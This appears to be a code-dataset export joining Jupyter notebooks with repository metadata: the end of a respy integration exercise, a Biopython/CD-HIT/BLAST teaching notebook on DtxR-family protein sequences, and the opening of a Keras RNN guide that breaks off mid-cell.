**respy** interface provides users with multiple methods for numerical integration. 
The relevant options to calibrate the integration method are `options[\"solution_draws\"]` which determines the number of integration points and `options[\"monte_carlo_sequence\"]` which determines the sequence that generates these points.\n\n**respy** offers Monte Carlo and Quasi-Monte Carlo methods to generate sequences for integration:\n\n- Monte Carlo Simulation: Chooses points randomly in the domain (`random`).\n- Quasi Monte Carlo Simulation: Chooses points from one of the two low-discrepancy sequences (`sobol`, `halton`).\n\n\nIn this exercise, we seek to implement a small simulation exercise to explore numerical integration in our Robinson Crusoe example.\n\n1. Load the `robinson_crusoe_extended` into memory and change the `solution_draws` in the `options` to a large number (e.g. 10,000) and simulate data. Compute choice frequencies based on this data. In the next steps we will treat these as the true solution and benchmark how different methods perform in comparison.\n3. Now simulate data for **different numbers of solution draws**. Compute the **root-mean-square-error (RMSE) of the choice frequencies** in this data compared to the *true* solution. Repeat the exercise for the three different sequences that are available in the **respy** interface: `sobol`, `halton`, and `random` and plot the resulting RMSE against the number of solution draws.\n", "_____no_output_____" ], [ "---\n\n### References\n\n- Adda, J., Dustmann, C., & Stevens, K. (2017). The career costs of children. *Journal of Political Economy*, 125(2), 293-337.\n\n- Blundell, R., Costa Dias, M., Meghir, C., & Shaw, J. (2016). Female labor supply, human capital, and welfare reform. *Econometrica*, 84(5), 1705-1753.\n\n- Eckstein, Z., Keane, M., & Lifshitz, O. (2019). Career and family decisions: Cohorts born 1935–1975. *Econometrica*, 87(1), 217-253.\n\n- Keane, M. P., & Wolpin, K. I. (1994). 
The solution and estimation of discrete choice dynamic programming models by simulation and interpolation: Monte Carlo evidence. The review of economics and statistics, 648-672.\n\n- Keane, M. P., & Wolpin, K. I. (1997). The career decisions of young men. *Journal of Political Economy*, 105(3), 473-522.\n\n- Keane, M. P., & Wolpin, K. I. (2000). Eliminating race differences in school attainment and labor market success. *Journal of Labor Economics*, 18(4), 614-652.", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ] ]
e73027a30852d65907f7c4fe94940a7701a518f2
19,065
ipynb
Jupyter Notebook
2 - Sequences_and_BLAST - v9.ipynb
CassTerrell/my-first-binder
7369ae87f2d007edcd5b8c57869893fc2d1aba0d
[ "CC0-1.0" ]
null
null
null
2 - Sequences_and_BLAST - v9.ipynb
CassTerrell/my-first-binder
7369ae87f2d007edcd5b8c57869893fc2d1aba0d
[ "CC0-1.0" ]
null
null
null
2 - Sequences_and_BLAST - v9.ipynb
CassTerrell/my-first-binder
7369ae87f2d007edcd5b8c57869893fc2d1aba0d
[ "CC0-1.0" ]
83
2021-06-07T21:31:14.000Z
2021-07-09T17:41:18.000Z
19,065
19,065
0.722948
[ [ [ "# Working with Sequence files using Biopython\n\nThe code boxes below will increase in complexity as we go on. Comments in the code begin with #s. Read these if you want help understanding the code.\n\nIn the first code box below, the first line \"turns on\" the SeqIO function of Biopython, a package (set of tools) built for biology and biochemistry! You can learn more at https://biopython.org/\n\nThe second line uses SeqIO (think: sequence input and output) to read a fasta file and stores the information as a list of records.\n\n<font color=blue><b>STEP 1:</b></font> The command below won't run correctly (you can try it!) unless you enter in the file to read. <b> Between the quotes, where it says <<\\<your file here>>>, change it to : files/uniprot-dtxr.fasta.</b>\n \nThen shift+enter to run the code. Be sure to wait for a number to appear in the brackets to the left of the code box. When the asterisk appears, that code is actively running!\n", "_____no_output_____" ] ], [ [ "from Bio import SeqIO # imports the SeqIO function from Biopython\n\nrecords = list(SeqIO.parse(\"<<<your file here>>>\", \"fasta\")) # reads the fasta file into a list of records \nprint(\"Finished storing the FASTA file in the list called \\\"records\\\".\")", "_____no_output_____" ] ], [ [ "While this <em>did</em> read the fasta file into a list of records, it isn't obvious how this helps us. Let's see how we can access different information about the sequence records stored in the list, records.\n\n<font color=blue><b>STEP 2:</b></font> The first line below will tell us how many sequences were in the fasta file, and then the information stored in the first item. Note that python numbering starts with the number 0. 
Go ahead and run the code box below.", "_____no_output_____" ] ], [ [ "print(\"There are %i sequences in your file.\\n\" % len(records)) # prints the number of sequences, that is, the length of the list, named records\n\nprint(records[0]) #prints the information in the first record", "_____no_output_____" ] ], [ [ "You should be able to see that first record includes several things: an ID, Name, Description, and a Sequence.\n\nWe can access each of those items specifically\n\n<font color=blue><b>STEP 3:</b></font> Run the code below to print only the sequence of the first record.", "_____no_output_____" ] ], [ [ "print(records[0].seq)", "_____no_output_____" ] ], [ [ "The next code box shows us how to list the first 10 ids. Then it lists the first record id and its sequence.\n\n<font color=blue><b>STEP 4:</b></font> Run the code box below.", "_____no_output_____" ] ], [ [ "print(\"The first 10 sequence record ids are:\\n\")\nfor i in range(10): # this creates a variable i and counts to 10\n print(records[i].id) # prints the id for record i\n \nprint(\"\\nThe record: %s has a sequence of: %s\\n\" % (records[-1].id, records[-1].seq)) # prints the record id and its sequence!", "_____no_output_____" ] ], [ [ "***\nGreat! The code above finds the first record (recall in Python we start counting at zero), so records[0].id gets the identification of the first record. \n\n<font color=blue><b>STEP 5:</b></font> Edit the last print statement in the code above to give the id and sequence of the 100th record.\n\nWe can also look at the last record id. You could put in the number of records (less one), but -1 is easier! 
The -1 starts counting from the end of the records list and you don't need to know how many records you have.\n\n<font color=blue><b>STEP 6:</b></font> Edit the last print statement in the code above to give the id and sequence of last record.\n\n***", "_____no_output_____" ], [ "<font color=blue><b>STEP 7:</b></font> Before you move on, check your knowledge by using the empty code box above to enter some code to answer these questions.\n\n 1. What is the sequence id for the 3rd record in the file?\n 2. What is the sequence id for the 250th record in the file?\n 3. What is the sequence id for the penultimate record in the file?\n \n<font color=blue><b>STEP 8:</b></font> It might be quite clear that simply locating records by their number isn't always the best way to interact with the data. Perhaps we would like to search by name, ID, or description. Let's examine the comments below to see how we can do this. You will need to edit the line that sets the variable search_term. In the code box below, change the text <b>\\<<<search term here\\>>></b> to one of the search terms below. 
Then run the code box.\n\n Search term ideas: DTXR, IDER, MNTR, dtxr, ider, mntr\n\n Where to search ideas: id, description, name", "_____no_output_____" ] ], [ [ "import re # imports the re (Regular Expressions) functions\n\nsearch_term = \"<<<search term here>>>\" # in between the quotes we can add a search term.\n \n\ncounter = 0 # a variable to keep track of how many times we find the term\n\nfor item in records: # this creates a loop to iterate over all the records \n if re.search(search_term, item.description, re.IGNORECASE): # Here we use re.search to find the search term in the item ID, returns true if yes\n print(item.description) # If the above is true we print the item ID...\n counter = counter + 1 # and increment our counter\n else: continue # if the search term wasn't found we do nothing, just continue on\n\n \n# the next two lines print a summary for us - either no hits or how many hits.\n \nif not counter: print(\"We didn't find any results using the search term: %s\" % search_term)\nelse: print(\"\\nWe found %i records using the search term: %s\" % (counter, search_term))", "_____no_output_____" ] ], [ [ "***\n\n<font color=blue><b>STEP 9:</b></font> Edit the code above to search the description rather than the ID. Make sure to change it in both places!\n\n***\n\nUsing Biopython's SeqIO function allows us to store lots of data in a way that is rapidly accessible.\n\nAs you have seen above, the IDs are a little long and redundant with the name. 
The code below simplifies the record ID and writes a new, simpler file.\n\n<font color=blue><b>STEP 10:</b></font> Read through the code below and run it.", "_____no_output_____" ] ], [ [ "original_file = \"files/uniprot-dtxr.fasta\" # original file path\nsimple_file = \"files/uniprot-dtxr_simple.fasta\" # new file path\n\nwith open(original_file) as original, open(simple_file, 'w') as simple: #opens the file to read and one to write\n records = SeqIO.parse(original, 'fasta') # here we use the Biopython SeqIO again to parse the file into records\n\n for item in records: # iterate through each item in the list called records\n tmp_name = str.split(item.id, \"|\")[1] # sets the variable tmp_name to the second item generated by splitting at the | character \n item.id = tmp_name # now this sets the id of that item to the name\n SeqIO.write(item, simple, 'fasta') # writes out the item information to the new, corrected fasta file", "_____no_output_____" ] ], [ [ "There is no output given for the above code. Let's consider how we changed this file by looking at the simplfied file.\n\n<font color=blue><b>STEP 11:</b></font> You can find the new file in the file browser in the left of your screen and double click to open it.", "_____no_output_____" ], [ "***\n## Big Data Strategies - Filtering and Reducing Redundancy in Datasets\n\nNow that we have a simpler fasta file, we still have a lot of sequences to deal with. It is often best to use fast and easy methods to pare down a dataset before using more computationally intensive ones. \n\nWe will start by filtering out small fragments and large proteins, then move on to removing redundancy.\n***", "_____no_output_____" ], [ "## Filtering by length\n\nLet's visualize the distribution of sequence lengths in our dataset. The code below will generate a histogram of the lengths of sequences. 
Charlie Weiss will give a thorough demonstration of this tool on Thursday!\n\n<font color=blue><b>STEP 12:</b></font> Run the code below to generate a histogram of sequence lengths.\n", "_____no_output_____" ] ], [ [ "import matplotlib.pyplot as plt\n\nrecords = list(SeqIO.parse(\"files/uniprot-dtxr_simple.fasta\", \"fasta\"))\n\nlengths = []\n\nfor i in records:\n #print(i.seq)\n lengths.append(len(i.seq))\n\nlengths.sort()\n#print(lengths)\n\nplt.hist(lengths, bins = 100)\nplt.xlabel('seq length')\nplt.ylabel('count')\nplt.show()", "_____no_output_____" ] ], [ [ "<font color=blue><b>STEP 13:</b></font> Answer the question:\n\n 1. Using the histogram, what are the most common lengths of proteins in this dataset?\n\n***\n\nWe will further reduce the complexity of this dataset by removing sequences that are much larger and much smaller than the most common lengths shown. Those variables can be determined using a histogram and easily changed for different datasets. Using the histogram we can identify values for the small_len=115 and large_len=250 variables.\n\n<font color=blue><b>STEP 14:</b></font> Run the code below to remove short and long sequences and generate a new fasta file called \"files/uniprot-dtxr_simple_trim.fasta\".\n", "_____no_output_____" ] ], [ [ "from Bio import SeqIO\n\noriginal_file = \"files/uniprot-dtxr_simple.fasta\"\ntrimmed_file = \"files/uniprot-dtxr_simple_trim.fasta\"\n\nsmall_len = 115\nlarge_len = 250\n\nwith open(original_file) as original, open(trimmed_file, 'w') as trimmed:\n records = SeqIO.parse(original_file, 'fasta')\n\n for record in records:\n if len(record.seq) > small_len and len(record.seq) < large_len: \n #print(len(record.seq))\n SeqIO.write(record, trimmed, 'fasta')\n \nrecords2 = list(SeqIO.parse(\"files/uniprot-dtxr_simple_trim.fasta\", \"fasta\"))\nprint(\"We now have %i sequences in our fasta file.\" % len(records2))", "_____no_output_____" ] ], [ [ "The above procedure removed about 5,000 sequences. 
This is a good start, but still a lot of sequences to visualize.\n***\n## Reducing sequence redundancy using CD-HIT\n\nWe will use the program CD-HIT to remove sequence within a given sequence similarity to another sequence. For example, the flag \"-c 0.4\" given below will keep only sequences with less than 40% sequence identity. The -n flag selects the word size used in processing. Less sequence identity requires the use of smaller words in comparing the sequences. From the CD-HIT manual:\n\n Choice'of'word'size:\n -n 5 for thresholds 0.7 ~ 1.0\n -n 4 for thresholds 0.6 ~ 0.7\n -n 3 for thresholds 0.5 ~ 0.6\n -n 2 for thresholds 0.4 ~ 0.5\n\nCD-HIT was installed when you launched the Binder. This is one of the benefits of using Binder.org\n\nFor this exercise we will use a cutoff of 40%. <b>In practice you might select higher values, but this will increase runtimes for the following steps and the visualization in the next Jupyter Notebook.</b>\n\n<font color=blue><b>STEP 15:</b></font> Let's run the code below. This runs CD-HIT using the simplified and trimmed fasta as input (-i) and creates a new fasta output (-o) named uniprot-dtxr_40.fasta that will be much smaller. The bang (!) at the beginning tells the notebook this is not a Python command, but rather a program to be run from the unix environment. <b>Note running CD-HIT takes a few minutes so this is a good time to take a quick break or ask questions!", "_____no_output_____" ] ], [ [ "!cd-hit -i files/uniprot-dtxr_simple_trim.fasta -o files/uniprot-dtxr_40.fasta -c 0.4 -n 2", "_____no_output_____" ] ], [ [ "CD-HIT has reduced over 30,000 sequences to under 2000 at 40% sequence identity! This is one strategy for dealing with very large datasets - they can be reduced. However, reduction needs to be done in a logical and reproducible manner. CD-HIT does just that. Again, depending on how closely related these proteins are, we might need to try different percent identity cutoffs. 
We will stay with 40%.", "_____no_output_____" ], [ "***\n## Adding in sequences of known function\n\nWe are almost done processing our FASTA dataset. In order to ensure that we can identify sequences of known function, we have created a small set of FASTA sequences of known function - obtained from the Protein Databank (https://rcsb.org). We will add these knowns to the FASTA file using the cat command (it stands for concatenate). \n\n<font color=blue><b>STEP 16:</b></font> Run the code below which combines the two files into a new file called \"files/final_40.fasta.", "_____no_output_____" ] ], [ [ "!cat \"files/uniprot-dtxr_40.fasta\" \"files/dtxr_pdbs.fasta\" > \"files/final_40.fasta\"", "_____no_output_____" ] ], [ [ "<font color=blue><b>STEP 17:</b></font> Run the code below to determine the final number of sequences in your file! ", "_____no_output_____" ] ], [ [ "records = list(SeqIO.parse(\"files/final_40.fasta\", \"fasta\")) # use SeqIO to process the file\n\nprint(\"There are %i sequences in your file.\\n\" % len(records)) # print the number of sequences", "_____no_output_____" ] ], [ [ "***\n\n## Making a BLAST-able database and performing an all-by-all BLAST search\n\nNow that we have our dataset we are going to use some of the NCBI BLAST tools to 1) create a searchable database using our processed set of sequences and 2) use protein BLAST to complete an all-by-all search of that database using each of those sequences.\n\nWe will perform an analysis of the evolutionary links between these sequences by determining which sequences are most closely related to which others.\n\n<font color=blue><b>STEP 18:</b></font> Let's see what the command makeblastdb does by using the -h (help) flag after the program name. Go ahead and run the code below. 
", "_____no_output_____" ] ], [ [ "!makeblastdb -help", "_____no_output_____" ] ], [ [ "The output above tells us the application of the program and how to indicate input and outout files.\n\n<font color=blue><b>STEP 19:</b></font> In the code box below we have added input and output files and told the program it is a protein database. The input is the files/final_40.fasta file. We will name the output files files/finalpro_40. Go ahead and run this code.", "_____no_output_____" ] ], [ [ "!makeblastdb -in files/final_40.fasta -dbtype prot -out files/finalpro_40", "_____no_output_____" ] ], [ [ "That last step was really quite fast given the smaller number of sequences. You can try this with more sequences, it will be slower, but you might need to use more sequences to find connections among your proteins. We should be good with this number for the exercise today.\n\n<font color=blue><b>STEP 20:</b></font> Next we want to use blastp (Basic Local Alignment Search Tool - Protein) to take each of our protein sequences and search the database for connections. Let's start by finding out the usage of blastp by running the command below.", "_____no_output_____" ] ], [ [ "!blastp -help", "_____no_output_____" ] ], [ [ "<font color=blue><b>STEP 21:</b></font> <b>This is the final step in generating new data to visualize in the next Jupyter Notebook.</b> We will run the code below to use blastp to search the files/finalpro_40 database using each of the sequences in the files/final_40.fasta file. <b>To be very clear - this will run almost 2000 BLAST searches!!!</b>\n\nThe outfmt controls the output formatting and the -evalue is the expectation value. Briefly evalues tell us how often we expect a search to return a given result by chance. An evalue of 1 would mean that the blast result would always be found by chance (and not by an evolutionary link). Smaller evalues help us to ensure that the results are not found simply by chance. 
In the code below we are using a value of 10e-40. Less stringent values of 10e-22 could also be used; however, this results in more data to visualize and longer processing times. ", "_____no_output_____" ] ], [ [ "!blastp -db files/finalpro_40 -query files/final_40.fasta -outfmt \"6 qseqid sseqid evalue\" -out files/BLASTe40_out -num_threads 4 -evalue 10e-40", "_____no_output_____" ] ], [ [ "Once the above code has completed running you should see a file in the file browswer at the left called \"BLASTe40_out\". This is simply a text file, but contains the information we want to visualize in the next Jupyter Notebook. <b>Let's download \"BLASTe40_out\" and \"final_40.fasta\" to our personal computers so we can use them later.<b> \n \n<font color=blue><b>STEP 22:</b></font> Download the file by clicking on the file \"BLASTe40_out\" and then go up to the Jupyter file menu and Download. Repeat for \"final_40.fasta\" Please note where you are downloading these files on your computer.\n\n<b>We will take a 10 min break here! I can answer questions during this time as well!</b>\n\nWhen we return, we will most likely need to either 1) restart the kernel or 2) relaunch the binder. Then we will open Jupyter Notebook \"3 - Visualizing_BLAST_data\" and upload our BLASTe40 file if needed.", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ] ]
e73037f658f16668988d6d319e675fa9033fc9d3
29,572
ipynb
Jupyter Notebook
guides/ipynb/working_with_rnns.ipynb
miykael/keras-io
a3bb3dc49b8eb0ebbe8a5d91329f8378eacdd7d4
[ "Apache-2.0" ]
1
2020-12-01T03:41:00.000Z
2020-12-01T03:41:00.000Z
guides/ipynb/working_with_rnns.ipynb
miykael/keras-io
a3bb3dc49b8eb0ebbe8a5d91329f8378eacdd7d4
[ "Apache-2.0" ]
null
null
null
guides/ipynb/working_with_rnns.ipynb
miykael/keras-io
a3bb3dc49b8eb0ebbe8a5d91329f8378eacdd7d4
[ "Apache-2.0" ]
null
null
null
32.748616
112
0.593162
[ [ [ "# Working with RNNs\n\n**Authors:** Scott Zhu, Francois Chollet<br>\n**Date created:** 2019/07/08<br>\n**Last modified:** 2020/04/14<br>\n**Description:** Complete guide to using & customizing RNN layers.", "_____no_output_____" ], [ "## Introduction\n\nRecurrent neural networks (RNN) are a class of neural networks that is powerful for\nmodeling sequence data such as time series or natural language.\n\nSchematically, a RNN layer uses a `for` loop to iterate over the timesteps of a\nsequence, while maintaining an internal state that encodes information about the\ntimesteps it has seen so far.\n\nThe Keras RNN API is designed with a focus on:\n\n- **Ease of use**: the built-in `keras.layers.RNN`, `keras.layers.LSTM`,\n`keras.layers.GRU` layers enable you to quickly build recurrent models without\nhaving to make difficult configuration choices.\n\n- **Ease of customization**: You can also define your own RNN cell layer (the inner\npart of the `for` loop) with custom behavior, and use it with the generic\n`keras.layers.RNN` layer (the `for` loop itself). This allows you to quickly\nprototype different research ideas in a flexible way with minimal code.\n", "_____no_output_____" ], [ "## Setup", "_____no_output_____" ] ], [ [ "import numpy as np\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\n", "_____no_output_____" ] ], [ [ "## Built-in RNN layers: a simple example\n", "_____no_output_____" ], [ "There are three built-in RNN layers in Keras:\n\n1. `keras.layers.SimpleRNN`, a fully-connected RNN where the output from previous\ntimestep is to be fed to next timestep.\n\n2. `keras.layers.GRU`, first proposed in\n[Cho et al., 2014](https://arxiv.org/abs/1406.1078).\n\n3. 
`keras.layers.LSTM`, first proposed in\n[Hochreiter & Schmidhuber, 1997](https://www.bioinf.jku.at/publications/older/2604.pdf).\n\nIn early 2015, Keras had the first reusable open-source Python implementations of LSTM\nand GRU.\n\nHere is a simple example of a `Sequential` model that processes sequences of integers,\nembeds each integer into a 64-dimensional vector, then processes the sequence of\nvectors using a `LSTM` layer.", "_____no_output_____" ] ], [ [ "model = keras.Sequential()\n# Add an Embedding layer expecting input vocab of size 1000, and\n# output embedding dimension of size 64.\nmodel.add(layers.Embedding(input_dim=1000, output_dim=64))\n\n# Add a LSTM layer with 128 internal units.\nmodel.add(layers.LSTM(128))\n\n# Add a Dense layer with 10 units.\nmodel.add(layers.Dense(10))\n\nmodel.summary()\n", "_____no_output_____" ] ], [ [ "Built-in RNNs support a number of useful features:\n\n- Recurrent dropout, via the `dropout` and `recurrent_dropout` arguments\n- Ability to process an input sequence in reverse, via the `go_backwards` argument\n- Loop unrolling (which can lead to a large speedup when processing short sequences on\nCPU), via the `unroll` argument\n- ...and more.\n\nFor more information, see the\n[RNN API documentation](https://keras.io/api/layers/recurrent_layers/).", "_____no_output_____" ], [ "## Outputs and states\n\nBy default, the output of a RNN layer contain a single vector per sample. This vector\nis the RNN cell output corresponding to the last timestep, containing information\nabout the entire input sequence. The shape of this output is `(batch_size, units)`\nwhere `units` corresponds to the `units` argument passed to the layer's constructor.\n\nA RNN layer can also return the entire sequence of outputs for each sample (one vector\nper timestep per sample), if you set `return_sequences=True`. 
The shape of this output\nis `(batch_size, timesteps, units)`.", "_____no_output_____" ] ], [ [ "model = keras.Sequential()\nmodel.add(layers.Embedding(input_dim=1000, output_dim=64))\n\n# The output of GRU will be a 3D tensor of shape (batch_size, timesteps, 256)\nmodel.add(layers.GRU(256, return_sequences=True))\n\n# The output of SimpleRNN will be a 2D tensor of shape (batch_size, 128)\nmodel.add(layers.SimpleRNN(128))\n\nmodel.add(layers.Dense(10))\n\nmodel.summary()\n", "_____no_output_____" ] ], [ [ "In addition, a RNN layer can return its final internal state(s). The returned states\ncan be used to resume the RNN execution later, or\n[to initialize another RNN](https://arxiv.org/abs/1409.3215).\nThis setting is commonly used in the\nencoder-decoder sequence-to-sequence model, where the encoder final state is used as\nthe initial state of the decoder.\n\nTo configure a RNN layer to return its internal state, set the `return_state` parameter\nto `True` when creating the layer. Note that `LSTM` has 2 state tensors, but `GRU`\nonly has one.\n\nTo configure the initial state of the layer, just call the layer with additional\nkeyword argument `initial_state`.\nNote that the shape of the state needs to match the unit size of the layer, like in the\nexample below.", "_____no_output_____" ] ], [ [ "encoder_vocab = 1000\ndecoder_vocab = 2000\n\nencoder_input = layers.Input(shape=(None,))\nencoder_embedded = layers.Embedding(input_dim=encoder_vocab, output_dim=64)(\n encoder_input\n)\n\n# Return states in addition to output\noutput, state_h, state_c = layers.LSTM(64, return_state=True, name=\"encoder\")(\n encoder_embedded\n)\nencoder_state = [state_h, state_c]\n\ndecoder_input = layers.Input(shape=(None,))\ndecoder_embedded = layers.Embedding(input_dim=decoder_vocab, output_dim=64)(\n decoder_input\n)\n\n# Pass the 2 states to a new LSTM layer, as initial state\ndecoder_output = layers.LSTM(64, name=\"decoder\")(\n decoder_embedded, 
initial_state=encoder_state\n)\noutput = layers.Dense(10)(decoder_output)\n\nmodel = keras.Model([encoder_input, decoder_input], output)\nmodel.summary()\n", "_____no_output_____" ] ], [ [ "## RNN layers and RNN cells\n\nIn addition to the built-in RNN layers, the RNN API also provides cell-level APIs.\nUnlike RNN layers, which processes whole batches of input sequences, the RNN cell only\nprocesses a single timestep.\n\nThe cell is the inside of the `for` loop of a RNN layer. Wrapping a cell inside a\n`keras.layers.RNN` layer gives you a layer capable of processing batches of\nsequences, e.g. `RNN(LSTMCell(10))`.\n\nMathematically, `RNN(LSTMCell(10))` produces the same result as `LSTM(10)`. In fact,\nthe implementation of this layer in TF v1.x was just creating the corresponding RNN\ncell and wrapping it in a RNN layer. However using the built-in `GRU` and `LSTM`\nlayers enables the use of CuDNN and you may see better performance.\n\nThere are three built-in RNN cells, each of them corresponding to the matching RNN\nlayer.\n\n- `keras.layers.SimpleRNNCell` corresponds to the `SimpleRNN` layer.\n\n- `keras.layers.GRUCell` corresponds to the `GRU` layer.\n\n- `keras.layers.LSTMCell` corresponds to the `LSTM` layer.\n\nThe cell abstraction, together with the generic `keras.layers.RNN` class, make it\nvery easy to implement custom RNN architectures for your research.\n", "_____no_output_____" ], [ "## Cross-batch statefulness\n\nWhen processing very long sequences (possibly infinite), you may want to use the\npattern of **cross-batch statefulness**.\n\nNormally, the internal state of a RNN layer is reset every time it sees a new batch\n(i.e. every sample seen by the layer is assume to be independent from the past). 
The\nlayer will only maintain a state while processing a given sample.\n\nIf you have very long sequences though, it is useful to break them into shorter\nsequences, and to feed these shorter sequences sequentially into a RNN layer without\nresetting the layer's state. That way, the layer can retain information about the\nentirety of the sequence, even though it's only seeing one sub-sequence at a time.\n\nYou can do this by setting `stateful=True` in the constructor.\n\nIf you have a sequence `s = [t0, t1, ... t1546, t1547]`, you would split it into e.g.\n\n```\ns1 = [t0, t1, ... t100]\ns2 = [t101, ... t201]\n...\ns16 = [t1501, ... t1547]\n```\n\nThen you would process it via:\n\n```python\nlstm_layer = layers.LSTM(64, stateful=True)\nfor s in sub_sequences:\n output = lstm_layer(s)\n```\n\nWhen you want to clear the state, you can use `layer.reset_states()`.\n\n\n> Note: In this setup, sample `i` in a given batch is assumed to be the continuation of\nsample `i` in the previous batch. This means that all batches should contain the same\nnumber of samples (batch size). E.g. 
if a batch contains `[sequence_A_from_t0_to_t100,\n sequence_B_from_t0_to_t100]`, the next batch should contain\n`[sequence_A_from_t101_to_t200, sequence_B_from_t101_to_t200]`.\n\n\n\n\nHere is a complete example:\n", "_____no_output_____" ] ], [ [ "paragraph1 = np.random.random((20, 10, 50)).astype(np.float32)\nparagraph2 = np.random.random((20, 10, 50)).astype(np.float32)\nparagraph3 = np.random.random((20, 10, 50)).astype(np.float32)\n\nlstm_layer = layers.LSTM(64, stateful=True)\noutput = lstm_layer(paragraph1)\noutput = lstm_layer(paragraph2)\noutput = lstm_layer(paragraph3)\n\n# reset_states() will reset the cached state to the original initial_state.\n# If no initial_state was provided, zero-states will be used by default.\nlstm_layer.reset_states()\n\n", "_____no_output_____" ] ], [ [ "### RNN State Reuse\n<a id=\"rnn_state_reuse\"></a>", "_____no_output_____" ], [ "The recorded states of the RNN layer are not included in the `layer.weights()`. If you\nwould like to reuse the state from a RNN layer, you can retrieve the states value by\n`layer.states` and use it as the\ninitial state for a new layer via the Keras functional API like `new_layer(inputs,\ninitial_state=layer.states)`, or model subclassing.\n\nPlease also note that sequential model might not be used in this case since it only\nsupports layers with single input and output, the extra input of initial state makes\nit impossible to use here.\n", "_____no_output_____" ] ], [ [ "paragraph1 = np.random.random((20, 10, 50)).astype(np.float32)\nparagraph2 = np.random.random((20, 10, 50)).astype(np.float32)\nparagraph3 = np.random.random((20, 10, 50)).astype(np.float32)\n\nlstm_layer = layers.LSTM(64, stateful=True)\noutput = lstm_layer(paragraph1)\noutput = lstm_layer(paragraph2)\n\nexisting_state = lstm_layer.states\n\nnew_lstm_layer = layers.LSTM(64)\nnew_output = new_lstm_layer(paragraph3, initial_state=existing_state)\n\n", "_____no_output_____" ] ], [ [ "## Bidirectional RNNs\n\nFor sequences other 
than time series (e.g. text), it is often the case that a RNN model\ncan perform better if it not only processes sequence from start to end, but also\nbackwards. For example, to predict the next word in a sentence, it is often useful to\nhave the context around the word, not only just the words that come before it.\n\nKeras provides an easy API for you to build such bidirectional RNNs: the\n`keras.layers.Bidirectional` wrapper.", "_____no_output_____" ] ], [ [ "model = keras.Sequential()\n\nmodel.add(\n layers.Bidirectional(layers.LSTM(64, return_sequences=True), input_shape=(5, 10))\n)\nmodel.add(layers.Bidirectional(layers.LSTM(32)))\nmodel.add(layers.Dense(10))\n\nmodel.summary()\n", "_____no_output_____" ] ], [ [ "Under the hood, `Bidirectional` will copy the RNN layer passed in, and flip the\n`go_backwards` field of the newly copied layer, so that it will process the inputs in\nreverse order.\n\nThe output of the `Bidirectional` RNN will be, by default, the sum of the forward layer\noutput and the backward layer output. If you need a different merging behavior, e.g.\nconcatenation, change the `merge_mode` parameter in the `Bidirectional` wrapper\nconstructor. For more details about `Bidirectional`, please check\n[the API docs](https://keras.io/api/layers/recurrent_layers/Bidirectional/).", "_____no_output_____" ], [ "## Performance optimization and CuDNN kernels\n\nIn TensorFlow 2.0, the built-in LSTM and GRU layers have been updated to leverage CuDNN\nkernels by default when a GPU is available. With this change, the prior\n`keras.layers.CuDNNLSTM/CuDNNGRU` layers have been deprecated, and you can build your\nmodel without worrying about the hardware it will run on.\n\nSince the CuDNN kernel is built with certain assumptions, this means the layer **will\nnot be able to use the CuDNN kernel if you change the defaults of the built-in LSTM or\nGRU layers**. 
E.g.:\n\n- Changing the `activation` function from `tanh` to something else.\n- Changing the `recurrent_activation` function from `sigmoid` to something else.\n- Using `recurrent_dropout` > 0.\n- Setting `unroll` to True, which forces LSTM/GRU to decompose the inner\n`tf.while_loop` into an unrolled `for` loop.\n- Setting `use_bias` to False.\n- Using masking when the input data is not strictly right padded (if the mask\ncorresponds to strictly right padded data, CuDNN can still be used. This is the most\ncommon case).\n\nFor the detailed list of constraints, please see the documentation for the\n[LSTM](https://keras.io/api/layers/recurrent_layers/LSTM/) and\n[GRU](https://keras.io/api/layers/recurrent_layers/GRU/) layers.", "_____no_output_____" ], [ "### Using CuDNN kernels when available\n\nLet's build a simple LSTM model to demonstrate the performance difference.\n\nWe'll use as input sequences the sequence of rows of MNIST digits (treating each row of\npixels as a timestep), and we'll predict the digit's label.\n", "_____no_output_____" ] ], [ [ "batch_size = 64\n# Each MNIST image batch is a tensor of shape (batch_size, 28, 28).\n# Each input sequence will be of size (28, 28) (height is treated like time).\ninput_dim = 28\n\nunits = 64\noutput_size = 10 # labels are from 0 to 9\n\n# Build the RNN model\ndef build_model(allow_cudnn_kernel=True):\n # CuDNN is only available at the layer level, and not at the cell level.\n # This means `LSTM(units)` will use the CuDNN kernel,\n # while RNN(LSTMCell(units)) will run on non-CuDNN kernel.\n if allow_cudnn_kernel:\n # The LSTM layer with default options uses CuDNN.\n lstm_layer = keras.layers.LSTM(units, input_shape=(None, input_dim))\n else:\n # Wrapping a LSTMCell in a RNN layer will not use CuDNN.\n lstm_layer = keras.layers.RNN(\n keras.layers.LSTMCell(units), input_shape=(None, input_dim)\n )\n model = keras.models.Sequential(\n [\n lstm_layer,\n keras.layers.BatchNormalization(),\n 
